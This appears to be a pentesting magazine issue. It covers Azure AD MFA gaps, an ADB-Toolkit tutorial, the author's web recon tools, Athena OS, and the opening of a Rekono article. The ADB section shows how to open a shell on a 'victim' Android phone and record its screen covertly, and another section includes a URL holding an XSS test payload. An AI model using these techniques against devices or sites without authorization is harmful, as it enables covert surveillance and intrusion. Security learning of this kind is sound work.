• If you pay for Azure AD Premium, leverage Conditional Access policies to enforce MFA.
• Security defaults might not adequately protect user accounts. In some of my testing, I switched IP
addresses multiple times to various countries (impossible travel) and single-factor ROPC
authentication continued to succeed. It’s best to explicitly enforce MFA for all accounts.
• Hybrid and federated MFA enforcement can leave "native" AAD accounts vulnerable.
• Some scenarios might remain vulnerable to single-factor authentication. That exposure should be
known and a conscious decision (risk acceptance).
• Know your weaknesses, monitor exposure, and continue locking down settings.
• Test and validate your configurations from an offensive security point of view!
And remember, as always, pentesting requires authorization from proper stakeholders beforehand.
Happy Hacking!
• Abusing Family Refresh Tokens by SecureWorks:
https://github.com/secureworks/family-of-client-ids-research
• Hackers are using this sneaky exploit to bypass Microsoft's MFA:
https://www.zdnet.com/article/hackers-are-using-this-sneaky-trick-to-exploit-dormant-microsoft-cloud-accounts-and-bypass-multi-factor-authentication/
ADB-Toolkit
ADB Wrapper for your Android Device, Helpful yet Deadly.
by Ashwini Sahu
In this article:
• We will examine attack scenarios in which your Android device can be compromised.
• We will use a tool named ADB-Toolkit: we will install and set it up, walk through the various options
it provides, and then wirelessly record a victim phone anonymously, without any APK or other
software. We'll also take a look at the Metasploit section of ADB-Toolkit.
• We will initialize a system shell of the Android device on the host machine, wirelessly.
• We will look at general use cases of ADB-Toolkit, and how you can transfer files significantly faster
than with traditional MTP, wired or wirelessly.
• We will also go through some checks and best practices for securing your Android device.
Before starting, I would like to give a special shoutout to Ms. Pallavi Das aka KiddoByte for her help in
testing the features on multiple devices.
Introduction
Android - we have all heard of this piece of software if we've been around since 2008. Android is one
of the most famous and widely used mobile operating systems, based on a modified version of the Linux
kernel. As of 2022, Android is the most popular operating system on the planet, with over 2.5
billion active users spanning more than 190 countries, covering over 70 percent of the mobile OS
market; the remaining 30 percent is covered by Apple's iOS.
That makes the 70 percent of users on Android exposed to the largest and most thriving body of
malware ever made for an operating system: Android receives about 97 percent of all mobile malware,
consisting of Trojans, adware, spyware, backdoors, and other kinds of malicious software.
We'll also talk about how to take care of your Android device, and which settings you should turn off
if you don't know what they're for.
So, talking about ADB-Toolkit: it's a wrapper around ADB, which stands for Android Debug Bridge. ADB is a
utility that lets us communicate with an Android device, and that utility, combined with the bare shell of your
Android device, makes this tool powerful and useful both in a pentest scenario and in day-to-day usage.
ADB-Toolkit is a script written purely in Bash, with 28 options plus a Metasploit section used for
Metasploit-style attacks: creating a payload, starting the Metasploit listener, and installing the
payload on the victim device. It also handles general tasks like installing an .apk file or pulling data from
and pushing data to the system.
Before installing and testing ADB-Toolkit, if you want to follow along, you must complete the prerequisite
setup explained below: we have to enable USB Debugging on your Android device to get started, and that
part is mandatory.
How to enable USB Debugging:
5. Turn on the USB debugging
Installation
Step 1: Clone the ADB-Toolkit Git repository to get the latest source code.
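The original screenshot of this step is not reproduced here. A dry-run sketch of the clone-and-install flow follows; the repository path is assumed from the author's GitHub profile (ASHWIN990, linked later in the article), and install.sh is a hypothetical installer name, so check the repository's README:

```shell
# Dry-run: echo the assumed clone-and-install commands rather than run them.
echo "git clone https://github.com/ASHWIN990/ADB-Toolkit.git"
echo "cd ADB-Toolkit && sudo ./install.sh"   # installer name is an assumption
```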
Upon successful installation, you will see this message:
When the installation part is finished, you can confirm the successful installation by running the
command below:
Procedure in brief: we are going to record the screen of an Android device. For that, we need to
connect the device to the host machine on which ADB-Toolkit is installed; there are two
modes of connection.
1. Wired Mode
2. Wireless Mode
In wireless mode, the Android device and the host machine need to be on the same network. For
example, if the phone is connected to the network via Wi-Fi or by any other means, you must be able
to ping the Android device from the host machine.
After that, we connect the Android device to the host machine once to establish a remote
connection; then we can perform various tasks.
Prerequisite: see the earlier topic "Preparing Your Android Device" and set up the tool.
Step 1: Connect your Android device to the host machine, and if the phone shows a confirmation
dialog, tap Yes or Allow.
Step 2: Change the directory to where you have cloned the ADB-Toolkit.
Step 3: Execute the script by running "sudo ./ADB-Toolkit" and choose Y/N for whether to restart
the ADB server. It is recommended not to restart the server if you are already connected to a client;
just open another instance of ADB-Toolkit.
Step 4: Verify that the Android device is properly connected by choosing option 1,
"Show Connected Devices".
For more details, you can use option 10, which is “Get Phone Details”.
It will provide various pieces of information, such as the model code, Wi-Fi interface, whether the device
is encrypted, the Android version, the latest security patch, and other details useful for further
reconnaissance; you can also see the full details of the device by entering Y at the prompt.
Step 5: Choose option 16, "Establish Remote Connect". This option extracts the IP address from
your Android device and establishes a remote connection with the host machine; after the
operation succeeds, you can unplug the device.
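Under the hood, this kind of remote connection boils down to the stock adb wireless flow. A dry-run sketch follows (the commands are echoed rather than executed, since they need a live device, and the IP address is hypothetical):

```shell
# Dry-run of the standard adb-over-Wi-Fi flow.
DEVICE_IP=192.168.1.50                # hypothetical; use your phone's address
echo "adb tcpip 5555"                 # 1. with the USB cable attached, switch adbd to TCP
echo "adb connect $DEVICE_IP:5555"    # 2. connect over the network; cable can be unplugged
echo "adb devices"                    # 3. verify the device now shows up as IP:5555
```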
You can launch the shell of your Android device by clicking Y but for this demo, we will do N.
It will start recording your Android device's screen; to stop the recording, press the Enter
key as shown on screen. The screen recording is stored in a directory named "Screenrecord",
and you can view the video by going to that directory.
So you have learned how to use ADB-Toolkit and, through it, how to remotely record a screen
anonymously.
Note: please don't use this with the wrong intentions; use it for learning purposes only.
Similarly, you can use option 17, "Capture A Screenshot Anonymously".
This takes a screenshot of your Android device and saves it to the "Screenshot" directory for you to
see; it's very simple to operate and has a very easy UI.
Aim: Start the system shell of your Android device in interactive mode.
Procedure in brief: we are going to start a shell of your Android system on the host
machine, so you can execute shell commands on your Android device from the host machine's terminal.
As in the previous demo, you can achieve this in two ways.
1. Wired Mode
2. Wireless Mode
Note: if you want to do this in wireless mode, follow the previous demo up to Step 5; doing so
creates a remote connection between your Android device and the host machine.
Prerequisite: see the earlier topic "Preparing Your Android Device" and set up the tool; for
wireless mode, follow the previous demo up to Step 5.
Step 1: Connect your Android device to the host machine, and if the phone shows a confirmation
dialog, tap Yes or Allow.
Step 2: Change the directory to where you have cloned the ADB-Toolkit.
Step 3: Execute the script by running "sudo ./ADB-Toolkit" and choose Y/N for whether to
restart the ADB server. It is recommended not to restart the server if you are already connected
to a client; just open another instance of ADB-Toolkit.
Step 4: Verify that the Android device is properly connected by choosing option 1,
"Show Connected Devices".
This will start an interactive, Unix-like shell in your terminal so that you can do
whatever you want. Keep in mind that one wrong command can brick your Android system, so be
careful with whatever you type; never copy and paste code or commands whose origin and
authenticity you don't trust.
For General Purpose Usage
Aim: Disable the bloatware on your system that you can't uninstall or remove from your Android device.
Procedure in brief: we are going to uninstall the apps that you want to disable but are unable
to through the normal settings.
Just connect your Android device and get the app's package name, which looks like this:
com.google.android.youtube
If you're not sure of the package name, you can also get it from the Play Store link.
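For instance, a Play Store link carries the package name in its `id` query parameter, so it can be extracted with a small POSIX shell one-liner (the URL below is YouTube's real listing, used here as an example):

```shell
# Extract the package name from a Play Store link's id= query parameter.
url='https://play.google.com/store/apps/details?id=com.google.android.youtube'
pkg=$(printf '%s' "$url" | sed -n 's/.*[?&]id=\([^&]*\).*/\1/p')
echo "$pkg"   # -> com.google.android.youtube
```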
Prerequisite: see the earlier topic "Preparing Your Android Device" and set up the tool.
Step 1: Connect your Android device to the host machine, and if the phone shows a confirmation
dialog, tap Yes or Allow.
Step 2: Change the directory to where you have cloned the ADB-Toolkit.
Step 3: Execute the script by running "sudo ./ADB-Toolkit" and choose Y/N for whether to
restart the ADB server. It is recommended not to restart the server if you are already connected
to a client; just open another instance of ADB-Toolkit.
Step 4: Choose option 14, "List All Installed Package"; this will list all the installed packages.
Select the package name that you want to uninstall; for example, we'll select:
com.fingersoft.hillclimb
In the next step, we will input this package name and see the result.
Step 5: Choose option 13, "Uninstall An Package". After selecting it, you have to enter the
package name. In this demo, we will use com.fingersoft.hillclimb, a game that came
preinstalled on my device.
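Under the hood, removing a package for the current user corresponds to adb's package-manager commands; whether ADB-Toolkit uses exactly these flags is an assumption. A dry-run sketch (the commands are echoed, since they need a connected device):

```shell
# Dry-run of the pm commands that per-user bloatware removal boils down to.
PKG=com.fingersoft.hillclimb
echo "adb shell pm uninstall --user 0 $PKG"      # remove the app for user 0
echo "adb shell pm disable-user --user 0 $PKG"   # or merely disable it
```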
For more features, and to manage your Android device's apps, you can use a tool I developed for this
sole purpose.
GitHub link: https://github.com/ASHWIN990/app-manager
Procedure in brief: we will use ADB's push/pull method because it's significantly faster than the
usual method, MTP. In my tests with a 2.0 GB file:
• ADB pull took 1.32 min to copy the file from the Android device to the host machine
• MTP took 3.2 min for the same transfer
• ADB push took 1.12 min to copy the file from the host machine to the Android device
• MTP took 3.4 min for the same transfer
You can use option 23, "Copy a Specified File Or Folder", to pull a file, or option 24, "Put A File In
Device", to push one. In both directions, the interface simply asks you to enter the file or folder path.
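The underlying transfer commands are adb's pull and push; a dry-run sketch follows (echoed rather than executed, since they need a connected device, and the paths are hypothetical):

```shell
# Dry-run of the transfers that options 23 and 24 wrap.
echo "adb pull /sdcard/DCIM/video.mp4 ./"        # device -> host
echo "adb push ./big-file.bin /sdcard/Download/" # host -> device
```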
This demo shows that the ADB push/pull method takes less time on Android devices, so you can use
ADB-Toolkit to transfer your files in both:
• Wired Mode
• Wireless Mode
Tips To Secure Your Android Device
Only you can secure your Android device by following these tips and practicing healthy smartphone
usage.
One of the simplest tips for protecting your device can be a blessing in disguise in case a situation goes
bad: keeping your Android phone locked is one of the first and foremost things you should do to keep
it secure.
If you own an Android smartphone, it is vital that you download apps and games only from trusted
sources.
Disable USB Debugging in the Developer options; it's very dangerous to leave enabled if you don't
know what it's for.
It is important to update your Android smartphone to the latest version of the OS that is available for
your device.
Many of us save passwords for applications we access regularly, as it makes signing in much easier
and faster; however, this convenience comes at a security cost, so avoid it where possible.
Hello, my name is Ashwini Sahu. I'm a Computer Science graduate who completed his Bachelor of
Technology in 2022. I currently work as a Research Assistant at a research facility at the Indian
Institute of Technology, Hyderabad, working on 5G security: writing PoCs, testing 5G core network
functions, and writing core software. I'm a highly motivated cybersecurity practitioner and an open
source software supporter and advocate.
@edoardottt's tools
by Edoardo Ottavianelli
Intro
It had always bothered me when I picked up a FOSS tool, installed it locally, configured it, and then it
didn't have the features I wanted, or it just worked in a way I didn't like. Luckily, I know how to code
and what I want. During these years, I have played with code on GitHub so much (https://github.com/
edoardottt), and I've built some tools specifically to satisfy my needs. These tools are focused on web/
network targets and designed to automate boring or time-consuming tasks. I’m going to present to you
some of the ones I use daily.
Note: I strongly believe in Open Source software and the power of community; if you think you can add
value to these repositories (in any form: typo fix, performance or security improvements, Cariddi
regexes…), just open an issue or a Pull Request. Contributions are always welcome.
Scilla
Using the time utility, I can understand how long the scan takes: 2 minutes and 40 seconds.
This instead is the result of doing the same, but using nmap:
It took almost four times as long as scilla. Don't get me wrong, nmap is the best tool for this
type of scan, but when I need something lighter and faster, I love using other tools.
As you can see from the second image, there is a downside: scilla seems not to spot filtered ports,
i.e., ports where an IDS/firewall is shielding the service.
The subdomain subcommand enumerates subdomains both using bruteforce (with a wordlist) and
downloading data from open databases: bufferOver.run, crt.sh, HackerTarget, SonarDB, ThreatCrowd,
and VirusTotal (for this one, you need to set the proper API key).
The dir command instead enumerates directories; you can use the default wordlist or set one
of your favorites (SecLists by Daniel Miessler is one of the most complete wordlist repositories).
Cariddi
In the last year, I spent some spare time hunting for bugs in big companies and US Government
services through Bugcrowd and, guess what? A lot of information disclosures and vulnerabilities were found
with the help of this little tool. In my opinion, this type of recon is underestimated: if you find an internal
IP address hidden in the source code of a webpage or in a file hosted on the server, take note of
it; if you later find a Server-Side Request Forgery vulnerability, you can use that IP to
increase the severity of the bug and leak sensitive data (bug bounty) or pivot into the internal
network (penetration test). If you find an email address belonging to the target company/organization,
you can use it when logging into their services; the same goes for secrets, files, and even
hidden URLs that could expose non-production-ready functionality.
Cariddi comes with well-tested built-in regexes, but it also supports custom regexes if you're interested
in a particular type of information. It is also possible to use a proxy, set custom headers, use a
particular User-Agent, or use a random User-Agent for each request. The power of Cariddi is its
crawling engine: colly (http://go-colly.org/), in my opinion the best scraper built for the Go language; it's
possible to set many options (follow robots.txt, don't visit the same page more than once,
cache support, and more). You will notice that Cariddi also crawls files that are non-sensitive or just
useless for security (e.g., CSS, images): it is designed this way to spot folders or paths that could
contain useful information (which you can later bruteforce for more content).
This tool reads input from standard input, which means you pipe in your list of targets to tell
Cariddi which domains/IPs to crawl. So the general usage is:
`cat targets.txt | cariddi {options}`, where {} means optional. Without options, it just
crawls URLs. It also comes with the option -h to show the help and -examples to show some examples
to get started.
• Crawl the pages hosted on that local URL (I can’t target public services just because if I find some
secrets I can’t show you the output)
• Search for general information (-info: email, IP and BTC addresses, HTML comments)
• Search for files with specific extensions (-ext n: n is an integer going from 1 (exceptional finding) to 7
(common files))
• Search for endpoints (-e: endpoints having parameters that can be attacked: SQL injections, cross-
site scripting, SSRF, LFI, and so on)
• Search for errors (-err: 7 Databases supported (MySQL, MariaDB, MSSQL, PostgreSQL, OracleDB,
IBMDB2 and SQLite), PHP and debug errors)
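The flags above can be combined in a single run. A dry-run sketch (the command is echoed rather than executed, since it needs a reachable target; the local URL is hypothetical):

```shell
# Dry-run: a combined Cariddi invocation using the flags described above.
printf 'http://localhost:8080\n' > targets.txt
echo "cat targets.txt | cariddi -info -ext 2 -e -err"
```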
Cariddi will always print the crawled URLs first and then all the information found on those pages. You
can save the output in different ways: HTML, JSON, or TXT files.
Cariddi will automatically separate the findings between different files (one file for the secrets, one file
for the URLs, one file for the errors, and so on).
Two other useful options are -insecure, to skip verifying the targets' TLS certificates, and -intensive,
to also search 2nd-level subdomains. Be careful with the last one: if you start crawling www.google.com
with this option, you're telling Cariddi to search in *.google.com! Every URL belonging to the organization
will be crawled and followed, which could result in billions of URLs!
lit-bb-hack-tools
https://example.com/test?p=%3Csvg+src%3Dx+onerror%3Dalert%281%29%3E&t=%3Csvg+src%3Dx+onerror%3Dalert%281%29%3E
Another tool I use a lot is tahm (Test All HTTP Methods): it performs HTTP requests using all the
available methods.
This can be useful to spot different behaviors when changing the HTTP method used.
It’s impossible to explain all the tools in the repository (25 at the time of writing), but if you think those
could be useful for you, just visit the link above; you will find a README in each tool folder describing
the purpose, the output, and the usage.
As I stated at the start of the article, if you have a problem with my tools or you want to suggest a new
feature, just open an issue, a Pull Request or go to edoardoottavianelli.it and contact me.
About the author
AthenaOS
by Antonio Voza
In the last few years, the InfoSec community has experienced an influx of new people joining the
cybersecurity field. Day by day, news about security incidents impacting governments and
major companies, the growing number of offers in the job market, and the "charm" of cybersecurity make
people curious about this wonderful field.
More and more people are joining hands-on hacking training platforms and studying for security
certifications in order to grow their knowledge and experience, and to open the door to a new
job in the InfoSec field.
For this purpose, the average user turns to pentesting operating systems that bundle several hacking
tools for vulnerability assessment, penetration testing, ethical hacking, or training.
Athena OS was born to offer a different experience from the most-used pentesting distributions. While
those OSes rely on the direct usage of hacking tools, Athena focuses on learning: it
connects the user, in a comfortable manner, to training resources and security feeds.
Technically, some distros rely mainly on Debian or GitHub repositories for retrieving security tools.
These repositories don't provide access to all security tools, and they are not easy to maintain.
Furthermore, these OSes ship with a large number of tools and services, a good percentage of which
is never used by the average user, wasting space and causing performance degradation.
Athena is designed from scratch, and during the development phase, useless modules and services
were excluded in order to improve performance and resource consumption. This design approach also
allowed us to review in detail every single package and component included in the distribution.
The result is a user-friendly environment, despite being based on Arch Linux.
Athena comes with an environment connected to a huge number of security resources, but they are not
installed by default. Why? Because the idea of Athena is to keep users connected to
all resources while retrieving only the tools and items they need. In this manner, users consume their
host resources (disk space, RAM, CPU) only for the tools and services they actually use. Of
course, users also have the chance to get the main tools in one step, as discussed below.
The environment is based on GNOME Wayland instead of Xorg for the following main reasons:
• Wayland is more secure, since it reduces the usage of root and isolates the input and output of every
window
In general, Wayland still has drawbacks with respect to Xorg; for example, it has compatibility issues with
several applications, whereas Xorg is much more stable. Currently, Athena also implements XWayland in
order to execute those applications that run only under Xorg.
Athena OS uses several repositories for accessing security tools and learning resources in a
comfortable manner: the core, extra, community, and multilib stable Arch Linux repositories for
system and utility packages; the BlackArch repository for retrieving all the security tools; the Chaotic
repository for accessing AUR packages directly through pacman; and the Athena repository, a remote
repository where new tools or packages not stored in the other repositories can be built and
maintained.
The structure of this repository is shown at https://github.com/Athena-OS/athena-repository, and it is
open to any contribution.
athena-repository
├── _config.yml
├── index.md
├── LICENSE
├── README.md
├── update-database.sh
└── x86_64
    ├── athena-repository.db.tar.gz
    ├── athena-repository.db.tar.gz.sig
    ├── athena-repository.files.tar.gz
    ├── athena-repository.files.tar.gz.sig
    ├── <package_name>.pkg.tar.zst
    ├── <package_name>.pkg.tar.zst.sig
    ├── packages
    │   └── <package_name>
    │       ├── build.sh
    │       └── PKGBUILD
    └── update_repo.sh
The source files of each package are inside the packages directory. Each package has a
PKGBUILD file defining the rules to build the .pkg.tar.zst package, and build.sh automates this
process by generating the new .pkg.tar.zst, signing it, moving it and its signature to the x86_64 folder,
and deleting all the temporary files.
When all packages are built, update-database.sh must be run; it calls the update_repo.sh script to
update the athena-repository.db* files with the newly built .pkg.tar.zst packages stored in the
x86_64 folder.
[athena-repository]
Server = https://athena-os.github.io/$repo/$arch
This operation is managed by the Calamares installer, which initializes all the keys stored in the
/usr/share/pacman/keyrings folder.
Calamares is a customizable installer framework designed to satisfy a wide variety of needs and use
cases. It aims to be easy and usable while remaining independent of any particular Linux distribution.
For these reasons, it has been chosen as the installation framework for Athena.
Calamares has been configured with several modules invoked inside /etc/calamares/settings.conf at
installation time. This configuration file mainly provides the following sections:
• Welcome: allowing the user to set the preferred language
• GPGPU: consisting of OpenCL modules useful for improving the cracking activities
Further modules could be added in the future, according to user needs. Under the hood of these
modules, several processes are run. The main ones are:
• contextualprocess: manages the theme chosen by the user and sets all the elements of the
environment according to the theme itself.
• shellprocess-before: initializes repository keys, enables cron, and cleans the FISH configuration file
of system commands.
• shellprocess-final: schedules a task that clears the page cache, dentries, and inodes in order to
increase performance; sets the right permissions on critical folders; checks for virtual machine tools if
needed; and removes the system installation files.
During the installation, the user can click the "Toggle log" button to read the installation logs in
real time. If any issues occur during the installation, Calamares provides a link to termbin.com,
where the logs are temporarily saved so the user can access them for troubleshooting.
An important element of the system is the display manager, which handles the login phase. Through
Calamares, users can choose the display manager they wish under the "Login Manager" pane.
Athena currently offers two solutions, GDM and LightDM, both customized for Athena:
GDM
LightDM
At first user login, Athena launches a configuration task that sets up the main Athena elements of the
user environment: the PenTOXIC menu, the PWNage menu, and Payload to Dock. It also
initializes GNOME elements for the chosen theme, retrieves Tmux plugins, and configures the NIST
feed. Especially for these last tasks, it is important that the system is connected to the Internet. This
activity is managed by the /etc/profile.d/run-once.sh script.
By clicking the first option, users install the main security resources they need to start their
ethical hacking activity. The Red Team Machine option triggers the /usr/local/bin/red-team-deployment
script, which calls the BlackArch repository to get several hacking tools and clones popular payload
repositories into the environment (i.e., PayloadsAllTheThings).
By clicking the second option, the system updates the Arch Linux, BlackArch, and Chaotic mirrorlists
in order to get the fastest mirrors for the current user. Update All Mirrors calls the reflector tool to
retrieve the fastest mirrors for the Arch Linux repositories, and /usr/local/bin/mirrors, a custom
implementation of rankmirrors, to retrieve the fastest mirrors for the BlackArch and Chaotic
repositories.
In Athena OS, three shells are mainly used: Bash, FISH, and PowerShell. Bash and FISH share the
same prompt pattern.
Athena mainly uses the FISH shell instead of Bash because of characteristics like the following:
• Extensive UI: syntax highlighting, autosuggestions, tab completion and selection lists that can be
navigated and filtered.
• Easy scripting: new functions can be added on the fly. The syntax is easy to learn and use.
Since FISH and Bash use different syntax, the user's session starts in Bash, because several
Bash scripts must be sourced at login (i.e., the /etc/profile.d/ scripts). When the user opens a
terminal, .bashrc is sourced to set configuration and variables, and at the end it executes FISH.
In Athena, Kitty is the default terminal. This choice was made for the following reasons:
Source: https://sw.kovidgoyal.net/kitty/performance/
Along with Kitty, Tmux has also been implemented as a terminal multiplexer.
Athena OS consists of several elements designed to make the user comfortable. Some of them are key
features of the user environment because they serve the objective of the project: bringing the user
closer to security and hacking resources.
PenTOXIC Menu
The PenTOXIC Menu organizes, in a visually appealing manner, all the main security tools that users need to start their hacking activity. It consists of two levels:
• 1st level: several hacking categories, plus the Firefox browser and Code OSS as editor
• 2nd level: the hacking tools deployed for each hacking category
These tools are not installed initially to avoid using disk space for tools or services that are never used.
For users that want access to these main tools, the Red Team Machine button of the Welcome App will
deploy them.
Athena’s tool surface can be increased by extending these main tools with the ones from BlackArch
repository.
BlackArch hacking tools can be installed in several ways. Users can install a single tool, categories or
all the tools.
For installing a category, execute sudo pacman -S <category-name>. There are several categories
that users can install:
• blackarch-anti-forensic: Countering forensic activities.
• blackarch-automation: Workflow automation.
• blackarch-automobile: Analyzing automotive applications.
• blackarch-backdoor: Exploiting or opening backdoors on already vulnerable systems.
• blackarch-binary: Operating on binary in some form.
• blackarch-bluetooth: Using Bluetooth attacks.
• blackarch-code-audit: Auditing existing source code for vulnerability analysis.
• blackarch-cracker: Cracking cryptographic functions.
• blackarch-crypto: Working with cryptography, with the exception of cracking.
• blackarch-database: Database exploitations on any level.
• blackarch-debugger: Debugging resources in realtime.
• blackarch-decompiler: Reversing a compiled program into source code.
• blackarch-defensive: Protecting resources from malware and attacks.
• blackarch-disassembler: Producing assembly output rather than the raw source code.
• blackarch-dos: Using DoS (Denial of Service) attacks.
• blackarch-drone: Managing physically engineered drones.
• blackarch-exploitation: Taking advantage of exploits in other programs or services.
• blackarch-fingerprint: Exploiting fingerprint biometric equipment.
• blackarch-firmware: Exploiting vulnerabilities in firmware.
• blackarch-forensic: Finding information on physical disks or embedded memory.
• blackarch-fuzzer: Fuzzing tools.
• blackarch-hardware: Exploiting or managing anything to do with physical hardware.
• blackarch-honeypot: Acting as "honeypots", i.e., programs that appear to be vulnerable services used to attract hackers into a trap.
• blackarch-ids: Intrusion Detection System tools.
• blackarch-keylogger: Recording and retaining keystrokes on a target system.
• blackarch-malware: Malicious software or malware detection.
• blackarch-misc: Miscellaneous tools.
• blackarch-mobile: Manipulating mobile platforms.
• blackarch-networking: Scanning selected systems for vulnerabilities or information about the network.
• blackarch-nfc: NFC technology tools.
• blackarch-packer: Operating on or involving packers.
• blackarch-proxy: Acting as a proxy, i.e., redirecting traffic through another node on the internet.
• blackarch-radio: Operating on radio frequency.
• blackarch-recon: Actively seeking vulnerable exploits in the wild.
• blackarch-reversing: Any decompiler, disassembler or any similar program.
• blackarch-scanner: Scanning selected systems for vulnerabilities or information about the network.
• blackarch-sniffer: Analyzing network traffic.
• blackarch-social: Social engineering attacks.
• blackarch-spoof: Spoofing attacker entity.
• blackarch-stego: Analyzing resources for hidden information.
It is also possible to install all hacking tools by executing sudo pacman -S blackarch.
PWNage Menu
The PWNage Menu allows users to quickly access the main hacking platforms for learning purposes and to join the main Discord InfoSec communities:
• the 1st level provides quick links to the main hacking platforms
• the 2nd level, accessed via the Discurity icon on top, lets the user join several Discord InfoSec servers or open the Discord app
Both PenTOXIC and PWNage are based on Simon Schneegans' Fly-Pie menu project: https://github.com/Schneegans/Fly-Pie.
One of the most interesting features of Athena is its deep integration with the Hack The Box platform, accessible through the PWNage menu. Athena makes it possible to play Hack The Box machines directly in the OS environment in a quick and comfortable manner, via the Hack The Box icon on the PWNage menu. The menu is automatically updated by a command inside /etc/profile.d/run-once.sh that calls the Hack The Box APIs and retrieves the latest free active machines.
Playing one of these machines edits the PS1 of the shell, showing the name of the laboratory, the target IP address, the attacker IP address, the Hack The Box username and the prize points.
The set of tools that manages the Hack The Box environment needs the App Token of the Hack The Box user, which can be retrieved from the profile settings of the Hack The Box website. Once retrieved, it can be set by calling the htb-update command.
Users with a Hack The Box VIP subscription can also play retired machines through the htb-play tool: htb-play -l lists all retired machines, and a machine is then started by specifying its name.
Payload to Dock
Another important security element in Athena is Payload to Dock. Based on Dash to Dock, it provides access to the most famous payload repositories, allowing users to get the latest version of payloads and access their paths directly from the shell. It shows:
• Auto Wordlists
• FuzzDB
• PayloadsAllTheThings
• SecLists
• Security Wordlist
The Dock also contains links to Mimikatz and Powersploit, and allows users to run FISH and
PowerShell.
Initially, these repositories are not installed, to avoid using disk space for payload repositories that are
never used. For users that would like to get these repositories, the Red Team Machine button of the
Welcome App can be used for deploying them.
To access these resources quickly, several environment variables have been defined on the system, so the user can retrieve the needed payload with less effort.
On the Firefox ESR browser, several extensions are installed by default. Worth mentioning are the well-
known FoxyProxy, already configured for Burp Suite usage, and HacKontext, an extension that allows
users to inject website information, HTTP headers and body parameters of the active browser tab on
specific InfoSec command-line tools in order to improve and speed up their correct usage. It helps
users to copy and paste headers and any parameters automatically to the tools.
As an example, by visiting the Arch Linux forum authentication page and selecting “Copy as FFUF”, the clipboard stores a ready-to-run ffuf command string, which the user can then edit to add the preferred wordlist and fuzzing parameters for attacking the target.
NIST Feed
NIST Feed is a special tool that informs users about newly published or updated CVEs through a popup notification containing a description of the CVE.
NIST Feed can be configured according to the parameters shown by nist-feed -h. Users can decide which kinds of CVEs they wish to be informed about, for instance, CVEs with a high impact on confidentiality and integrity, or CRITICAL CVEs. Some examples:
• Set desktop notifications for the latest or updated CVEs with CRITICAL severity:
nist-feed -n -l -s CRITICAL
• Show details about the last three CVEs, with no desktop notifications:
nist-feed -r 3
• Show details about the last twenty CVEs with PHYSICAL as attack vector and MEDIUM severity, with no desktop notifications:
nist-feed -V AV:P -s MEDIUM
• Set desktop notifications for the latest or updated CVEs having high Confidentiality, Integrity and Availability impact:
nist-feed -n -l -m C:H/I:H/A:H
or
nist-feed -n -l -c C:H -i I:H -a A:H
• Set desktop notifications for the latest or updated CVEs with HIGH attack complexity and NETWORK as attack vector:
nist-feed -n -l -A AC:H -V AV:N
Reference: https://nvd.nist.gov
The -s argument is used for setting a scheduled popup notification on crontab according to the
specified filters.
When the popup notification is shown, users can left-click on it for access to the NIST NVD page with
all detailed information, or right-click to close it.
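Conceptually, these severity and impact filters amount to matching components of a CVSS vector string against a CVE's vector. A rough Python sketch of that matching logic (the helper names and parsing are illustrative assumptions, not nist-feed's actual code):

```python
# Sketch of CVSS-vector filtering as described above.
# parse_vector and matches are hypothetical helpers, not nist-feed code.

def parse_vector(vector: str) -> dict:
    """Split a CVSS vector like 'AV:N/AC:H/C:H' into a metric -> value map."""
    return dict(part.split(":", 1) for part in vector.split("/"))

def matches(cve_vector: str, required: str) -> bool:
    """True if every metric in 'required' has the same value in the CVE's vector."""
    cve = parse_vector(cve_vector)
    want = parse_vector(required)
    return all(cve.get(k) == v for k, v in want.items())

# A CVE with network attack vector and high C/I/A impact:
vec = "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
print(matches(vec, "C:H/I:H/A:H"))  # high-impact filter, as in -m C:H/I:H/A:H
print(matches(vec, "AV:P"))         # physical attack vector filter, as in -V AV:P
```

A CVE only triggers a notification when all requested metrics match, which is why combined filters such as -A AC:H -V AV:N narrow the feed considerably.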
All this technical content is surrounded by several amazing themes, synchronized across GTK, icons, desktop background, Tmux, mouse cursor, Kitty terminal, Visual Studio Code and the PenTOXIC menu. This graphical environment was created to reduce the complexity inherited from the Arch Linux base system.
Finally, this is not the end of Athena OS. Athena is at the beginning of its life, and many important features are planned to further improve the hacking and learning experience. Athena was created mainly for one purpose: guiding new people closer to the world of cyber security and providing instruments for learning, growing and improving their own knowledge and skills.
Would you like to have a look at Athena?
Be of good cheer, and let not these things distress your heart.
Rekono
by Pablo Santiago López
Do you ever think about the steps that you follow when you start pentesting? You probably start by
performing some OSINT tasks to gather public information about the target. Then, maybe you run hosts
discovery and ports enumeration tools. When you know what the target exposes, you can execute
more specific tools for each service, to get more information and, maybe, some vulnerabilities. And
finally, if you find the needed information, you will look for a public exploit to get you into the target
machine. I know, I know, this is a utopian scenario, and in most cases, the vulnerabilities are found thanks to the pentester's skills rather than scanning tools. But before using your skills, how much time do you spend trying to get as much information as possible with hacking tools? Probably too much.
Rekono is a distributed platform that combines other hacking tools and their results to execute
complete pentesting processes against a target in an automated way. The findings obtained during the
executions will be sent to the user via email or Telegram notifications and can also be imported in
Defect-Dojo if more advanced vulnerability management is needed. Note that Rekono doesn't exploit vulnerabilities; its goal is to get as much information as possible from the target.
So, why not automate pentesting processes and focus on finding vulnerabilities using your skills and
the information that Rekono sends you?
The main Rekono feature is the execution of external hacking tools, which can be performed in two different ways: including them in pentesting processes or running them independently. Pentesting processes are groups of different tools and configurations that are executed together automatically. For example, in the picture above, you can see one default process that includes all the tools supported by Rekono:
The pentesting processes can be created dynamically, including only the hacking tools that the auditor needs. This is possible because the dependencies between the different tool executions are established based on the inputs and potential results of each one. For example,
given a process that includes Nmap, SSH audit, CMSeeK and Metasploit, the executions will be
launched in that order:
• Nmap: finds the hosts, ports and services exposed by the target.
• SSH audit: executed on the SSH services found by Nmap to identify vulnerabilities.
• CMSeeK: executed on the HTTP services found by Nmap to identify CMS technologies and vulnerabilities.
• Metasploit: processes all the CVEs found by SSH audit and CMSeeK to look for known public exploits.
In this case, SSH audit and CMSeeK can be executed at the same time because there are no
dependencies between them.
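The ordering described above can be sketched as wave-based scheduling over each tool's declared inputs and outputs; tools whose inputs are already available run together. The tool declarations below are illustrative, not Rekono's internal model:

```python
# Sketch: schedule tools in waves based on the finding types they consume/produce.
# The "needs"/"produces" declarations are illustrative, not Rekono internals.
TOOLS = {
    "Nmap":       {"needs": set(),     "produces": {"ssh", "http"}},
    "SSH audit":  {"needs": {"ssh"},   "produces": {"cve"}},
    "CMSeeK":     {"needs": {"http"},  "produces": {"cve"}},
    "Metasploit": {"needs": {"cve"},   "produces": {"exploit"}},
}

def schedule(tools):
    """Group tools into waves; tools in the same wave can run in parallel."""
    available, waves, pending = set(), [], dict(tools)
    while pending:
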